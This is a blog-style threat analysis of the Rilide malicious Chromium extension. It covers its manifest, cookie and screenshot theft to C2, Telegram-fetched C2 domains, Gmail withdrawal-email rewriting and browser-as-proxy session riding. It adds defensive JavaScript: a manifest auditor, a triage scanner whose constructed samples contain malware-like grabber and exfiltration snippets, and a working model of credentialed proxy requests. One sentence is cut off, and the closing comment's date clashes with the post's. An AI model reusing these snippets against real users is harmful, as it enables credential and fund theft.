#Gmailjs
govindhtech · 4 days ago
Rilide Malware: How Browser Extensions Affect Online Threats
How Rilide strikes via browser extensions:
What is Rilide?
Rilide, also tracked as LumaC2 and CookieGenesis, is a capable malware family first documented in 2023. It targets Chromium-based browsers to harvest user data and control browser behaviour. Its defining feature is that it is delivered and operates as a malicious browser extension, and it abuses that extension to carry out its attacks.
The Shift to Browser Extension Attacks
Rilide is a sign of a major shift in browser threats. Traditional man-in-the-browser attacks used malware that detected HTML patterns in browser memory and inserted
Modern attacks using malicious browser extensions such as Rilide sidestep most of those constraints. An extension is not tied to any one website, so it can run in the background. It also holds broader privileges: it can reach browser-wide resources such as cookies and local storage and is not bound by same-origin restrictions. Because an extension keeps running even when no page is open, it offers more persistence and control than classic web-injection methods.
Extensions also change the JavaScript execution context. Conventional injections could leave traces because they ran in the same context as the web application's code and any in-page security tooling. An extension adds two JavaScript environments beside the main page context:
The content script context, which is isolated from the page's own JavaScript but can still read and modify the page document (the DOM).
The background context, which runs as a service worker; neither the main page environment nor the content script can access it directly.
The contexts communicate through browser messaging interfaces that are invisible to page code. Because much of the extension's activity and evidence lives outside the page by design, detection is harder: the original document need not change at all. The greater control, persistence, evasion and ease of development explain why browser threats have moved to extensions. Modern extension APIs ship with extensive built-in functionality and permissions, which makes such extensions easy to build.
Technique: How Rilide Uses Extension Components
Rilide uses standard browser extension components to carry out its attacks:
The manifest:
This file declares the extension's functionality and access levels. One Rilide variant posed as a Google Drive plugin. The permissions listed in the manifest reveal Rilide's capabilities. Rilide requested these notable permissions:
"scripting": inject and run JavaScript on web pages.
"cookies": read, change and delete browser cookies.
"webRequest": observe and modify the browser's network requests.
"clipboardRead" / "clipboardWrite": read and edit clipboard content.
"activeTab": temporary access to the current tab's content. Through "host_permissions" the extension can access and interact with every scheme, host, path and port the browser supports.
Content scripts are declared to run on all URLs at document_start, so they execute early in page loading, before the page's own scripts. The manifest also registers rules under "declarative_net_request" that strip Content Security Policy (CSP) headers from responses, so Rilide can insert inline content that a page's CSP would otherwise block. Under "background" sits the extension's service worker, where the malware tracks browser events and talks to the C2 server.
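The manifest traits listed above are exactly what a reviewer should look for when triaging an unknown extension. The following is an added example, not Rilide's manifest or code and not from the original post: it audits a Manifest V3 manifest together with its declarativeNetRequest rule file for broad host access, high-risk permissions, document_start content scripts on every URL, a background service worker, and rules that strip CSP response headers. The sample manifest, its rule set and the extension name "Drive Helper" are constructed for illustration.

```javascript
// Added example; not Rilide's manifest or code. Audits a Chrome Manifest V3
// manifest plus its declarativeNetRequest rules for the capability
// combination described in the text. Sample data below is constructed.

const HIGH_RISK_PERMISSIONS = new Set([
  "scripting", "cookies", "webRequest", "webRequestBlocking",
  "clipboardRead", "clipboardWrite", "declarativeNetRequest",
  "declarativeNetRequestWithHostAccess", "history", "management", "tabs",
]);

const CSP_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
]);

// "<all_urls>" or a match pattern whose host part is a bare wildcard covers
// every site the browser can load.
function isBroadHostPattern(pattern) {
  return pattern === "<all_urls>" || /^(\*|https?|ftp|file):\/\/\*\/.*$/.test(pattern);
}

// Returns a list of findings for one manifest plus the rules it references.
// An empty list means none of the audited traits were present.
function auditManifest(manifest, rules = []) {
  const findings = [];

  for (const p of manifest.permissions || []) {
    if (HIGH_RISK_PERMISSIONS.has(p)) findings.push(`permission:${p}`);
  }

  if ((manifest.host_permissions || []).some(isBroadHostPattern)) {
    findings.push("host_permissions:all-urls");
  }

  for (const cs of manifest.content_scripts || []) {
    const early = cs.run_at === "document_start";
    const broad = (cs.matches || []).some(isBroadHostPattern);
    if (early && broad) {
      findings.push(`content_script:document_start-on-all-urls:${(cs.js || []).join(",")}`);
    }
  }

  // declarativeNetRequest rules that remove CSP from responses let the
  // extension insert inline script a site's policy would otherwise block.
  for (const rule of rules) {
    const action = rule.action || {};
    if (action.type !== "modifyHeaders") continue;
    for (const h of action.responseHeaders || []) {
      const name = String(h.header || "").toLowerCase();
      if (h.operation === "remove" && CSP_HEADERS.has(name)) {
        findings.push(`dnr:strips-${name}`);
      }
    }
  }

  if (manifest.background && manifest.background.service_worker) {
    findings.push("background:service_worker");
  }
  return findings;
}

// Constructed sample modelled on the capability set described in the text.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Drive Helper", // hypothetical name
  version: "1.0",
  permissions: [
    "scripting", "cookies", "webRequest", "clipboardRead", "clipboardWrite",
    "activeTab", "declarativeNetRequest", "alarms", "storage",
  ],
  host_permissions: ["<all_urls>"],
  content_scripts: [
    { matches: ["<all_urls>"], js: ["main.js"], run_at: "document_start" },
  ],
  background: { service_worker: "background.js" },
  declarative_net_request: {
    rule_resources: [{ id: "csp", enabled: true, path: "rules.json" }],
  },
};

// Constructed rules.json content: one rule removing CSP from every page.
const SAMPLE_RULES = [
  {
    id: 1,
    priority: 1,
    action: {
      type: "modifyHeaders",
      responseHeaders: [{ header: "Content-Security-Policy", operation: "remove" }],
    },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
  },
];

console.log(auditManifest(SAMPLE_MANIFEST, SAMPLE_RULES));
```

Run it against a real unpacked extension by loading its manifest.json and the file named under rule_resources with JSON.parse; any hit on "dnr:strips-content-security-policy" combined with "host_permissions:all-urls" deserves a manual read of the content scripts.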
background.js, the background script:
When the extension is installed, this script runs its initialisation code. chrome.system gathers CPU and storage details, chrome.management gathers data on installed extensions, and chrome.cookies.getAll collects every cookie at startup. A unique victim ID is kept in local storage. This data is sent to the C2 server, which may in turn instruct the extension to act as a proxy.
Initialisation also fetches commands, malware settings and web injections. After enabling the CSP-removal rules, the background script monitors browser events. It has a distinctive way of obtaining C2 server domains: recurring chrome.alarms callbacks fetch them from a Telegram bot, so if one domain is blocked the malware simply switches to another.
The background script listens for content-script messages such as "new-grabber-info", which carry captured input-element values, and forwards the data to the C2 server. On "set-screenshot-result" messages it calls chrome.tabs.captureVisibleTab to capture the visible tab and sends the screenshot to the C2. Recurring alarms also verify and initiate proxy connections and execute C2 commands.
cmds.js, the command script:
This script receives commands from the C2 server and returns results. Notable commands include:
"extension": enables extensions selected by ID.
"push": opens a new tab and displays fetched content in a browser notification.
"screenshot": captures the tab's content.
"history": retrieves browsing history.
"cookies": retrieves all browser cookies.
"url": opens a new tab at a given URL. Further commands return device details, the current URL and the extension configuration. Because they build directly on Chrome extension APIs, these commands let the attacker change the workflow dynamically with little development effort.
main.js and gmail.js, the content scripts:
These scripts interact with web pages.
main.js:
This script bundles jQuery together with obfuscated malicious code. The injections downloaded from the service worker at initialisation are executed when the page URL matches. One clever injection technique sets the onreset attribute of a document element and immediately dispatches a custom reset event to run the payload, which makes detection difficult. main.js also uses jQuery to build a generic data-stealing listener over all input elements: it listens for change events on the selected elements and collects values such as usernames and passwords once the value has changed and the element loses focus. chrome.runtime.sendMessage passes the stolen data to the service worker, which relays it to the C2 server.
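The API calls named for the background script, the command script and main.js are the kind of static indicators an analyst can grep for before reading an extension line by line. The following is an added example, not Rilide's code and not from the original post: a small triage scanner that scores extension source files by the patterns described above (cookie dumps, tab screenshots, Telegram-based C2 lookups on a timer, the onreset trick, the jQuery input grabber that messages the background). The sample sources are constructed to resemble those behaviours; the indicator names and weights are this example's own.

```javascript
// Added example; not Rilide's code. Static triage of extension sources for
// the API patterns described in the text. Sample sources are constructed.

const INDICATORS = [
  { id: "cookie-dump",       weight: 3, re: /chrome\.cookies\.getAll\s*\(/ },
  { id: "screenshot",        weight: 2, re: /chrome\.tabs\.captureVisibleTab\s*\(/ },
  { id: "telegram-c2",       weight: 3, re: /api\.telegram\.org/ },
  { id: "periodic-alarm",    weight: 1, re: /chrome\.alarms\.create\s*\(/ },
  { id: "history-dump",      weight: 2, re: /chrome\.history\.search\s*\(/ },
  { id: "extension-toggle",  weight: 2, re: /chrome\.management\.setEnabled\s*\(/ },
  { id: "websocket-channel", weight: 1, re: /new\s+WebSocket\s*\(/ },
  // onreset attribute set, then a synthetic reset event fired shortly after
  { id: "onreset-injection", weight: 3,
    re: /["']onreset["'][\s\S]{0,200}?new\s+Event\(\s*["']reset["']\s*\)/ },
  // jQuery selection of all inputs followed by a message to the background
  { id: "input-grabber",     weight: 3,
    re: /\$\(\s*["']input["']\s*\)[\s\S]{0,300}?runtime\.sendMessage/ },
];

// Score one file: which indicators fired and their summed weight.
function scanSource(file, code) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (ind.re.test(code)) {
      hits.push(ind.id);
      score += ind.weight;
    }
  }
  return { file, hits, score };
}

// Scan a map of file name -> source text; highest score first.
function triage(files) {
  return Object.entries(files)
    .map(([file, code]) => scanSource(file, code))
    .sort((a, b) => b.score - a.score);
}

// Constructed samples resembling the behaviours described in the text.
const SAMPLE_FILES = {
  "background.js": `
chrome.alarms.create("refresh-domains", { periodInMinutes: 30 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch("https://api.telegram.org/bot000000:placeholder/getUpdates");
  domains = parseDomains(await r.json());
});
chrome.runtime.onMessage.addListener((msg) => {
  if (msg.type === "new-grabber-info") exfil(msg.data);
  if (msg.type === "set-screenshot-result")
    chrome.tabs.captureVisibleTab(null, {}, (png) => exfil(png));
});
chrome.cookies.getAll({}, (cookies) => exfil(cookies));
`,
  "main.js": `
document.documentElement.setAttribute("onreset", injectedCode);
document.documentElement.dispatchEvent(new Event("reset"));
$("input").on("change", function () {
  chrome.runtime.sendMessage({ type: "new-grabber-info", name: this.name, value: $(this).val() });
});
`,
  "benign.js": `
chrome.storage.local.get(["theme"], (res) => applyTheme(res.theme));
`,
};

console.log(triage(SAMPLE_FILES));
```

Heavily obfuscated samples will defeat plain regexes; the scanner is a first pass to decide which files to deobfuscate, not a verdict.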
gmail.js:
This script targets mail.google.com, the Gmail web client. Its main purpose is to tamper with 2FA authorisation emails so that cryptocurrency theft goes unnoticed. The script regularly checks for emails from popular cryptocurrency wallets and exchanges. If an email contains "Withdrawal Request", it replaces that text with "Authorise New Device"; to rewrite the email preview, it targets span elements containing "withdrawal".
The script identifies the email body and the authorisation code from CSS classes and content, then replaces the body's HTML with hardcoded text. The threat actor uses this to make victims read withdrawal confirmations as far less suspicious new-device authorisations, so the cryptocurrency can be withdrawn without alerting them. Because locating the email body elements depends on formatting and language, this step is the least reliable part of the attack.
Proxy Capability
One of Rilide's most dangerous capabilities is turning the victim's browser into an HTTP proxy, something extensions can implement readily. The attacker can route requests through the victim's browser so that they carry the victim's credentials and session data. This is especially damaging for financial fraud: the attacker can use the victim's authenticated session to reach financial systems and initiate transactions or change settings, and because the requests originate from the victim's own machine, IP-address checks do not flag them.
Most of the proxy functionality is derived from CursedChrome, an educational proof-of-concept. It uses a WebSocket to link the attacker's C2 server to the extension's service worker; the C2 sends requests, the browser performs them with the victim's cookies attached, and the results flow back to the C2 for navigation or further queries. CursedChrome ships with backend code and an administrative UI, which shows how little effort this takes.
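To make the proxy exchange concrete, here is an added example, not CursedChrome's or Rilide's code and not from the original post. It models both ends of the channel in-process: the C2 builds a request description, the extension side performs it with fetch, and the response goes back. The real WebSocket transport is replaced by a plain array of messages, and fetch is injected so a constructed stand-in for a bank can show why the requests succeed: with credentials: "include" the browser attaches the victim's session cookie itself, so the C2 never has to steal or replay it, and the target only ever sees the victim's own address.

```javascript
// Added example; not CursedChrome's or Rilide's code. Offline model of the
// browser-as-proxy exchange. Transport and target site are constructed.

// C2 side: the message that would travel down the WebSocket.
function makeProxyRequest(id, url, { method = "GET", headers = {}, body = null } = {}) {
  return { type: "proxy-request", id, url, method, headers, body };
}

// Extension (service worker) side: perform the request from inside the
// victim's browser. credentials: "include" is what turns this into session
// riding; in a real extension fetchImpl would be the global fetch.
async function handleProxyRequest(msg, fetchImpl) {
  if (msg.type !== "proxy-request") throw new Error("unexpected message type");
  const resp = await fetchImpl(msg.url, {
    method: msg.method,
    headers: msg.headers,
    body: msg.body,
    credentials: "include",
    redirect: "manual",
  });
  return {
    type: "proxy-response",
    id: msg.id,
    status: resp.status,
    headers: resp.headers,
    body: await resp.text(),
  };
}

// Constructed stand-in for a target site. It accepts a request only when the
// browser attached the session cookie (modelled through the credentials
// flag) and records what it saw; note that no client IP check would help.
function makeFakeBank(sessionCookieValue) {
  const log = [];
  const fetch = async (url, init) => {
    const cookieSent = init.credentials === "include" ? sessionCookieValue : null;
    log.push({ url, method: init.method, cookieSent });
    if (!cookieSent) {
      return { status: 401, headers: {}, text: async () => "login required" };
    }
    if (url.endsWith("/transfer") && init.method === "POST") {
      return { status: 200, headers: {}, text: async () => `transfer accepted: ${init.body}` };
    }
    return { status: 200, headers: {}, text: async () => "account balance: 1234.56" };
  };
  return { log, fetch };
}

// Drive one full exchange: two C2 requests, two proxied responses.
async function runExchange() {
  const bank = makeFakeBank("sid=constructed-session-value");
  const c2Queue = [
    makeProxyRequest(1, "https://bank.example/account"),
    makeProxyRequest(2, "https://bank.example/transfer", {
      method: "POST",
      headers: { "content-type": "application/x-www-form-urlencoded" },
      body: "to=attacker&amount=500",
    }),
  ];
  const responses = [];
  for (const msg of c2Queue) responses.push(await handleProxyRequest(msg, bank.fetch));
  return { responses, log: bank.log };
}

runExchange().then(({ responses, log }) => {
  console.log(responses);
  console.log(log);
});
```

The defensive lesson is in the fake bank's log: every proxied request arrives with a valid session cookie from the victim's real address, so the only server-side signals left are behavioural (unusual transfer destinations, timing, device fingerprint changes) rather than network-level.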
Scale and Indicators
The Trusteer research lab has observed 50,000 compromised user sessions since early 2025, which shows the scale of the problem. Rilide's campaign is global, targeting North America, South America, Europe and Japan.
The research provides indicators of compromise such as file names and hashes, including:
Files: ico.png, crrule.js, exts.js, rules.json, manifest.json, utils.js, historytab.js, notif.js, config.js, content-scriptsApp.html, background.js, main.js, gmail.js, csp.js, exchangeSettings.js, screen.js, domain.js, inj.js, set.js, proxing.js, cmds.js, machine.js, and -register-pol
Archive: extFiles.zip
Domain: statbrwsr.digital
In conclusion, Rilide is advanced malware that uses browser extensions to gain long-term control, access private data, bypass security measures and steal cryptocurrency and financial data far more covertly than earlier web-injection methods.
otthonzulles · 2 years ago
I'm no expert, but then this must have been a targeted attack. Nobody cares about Aunt Mari's Gmail and YouTube channel, I suppose.
@muszeresz could this story be true as told, or is something off about it? Pretty scary 😄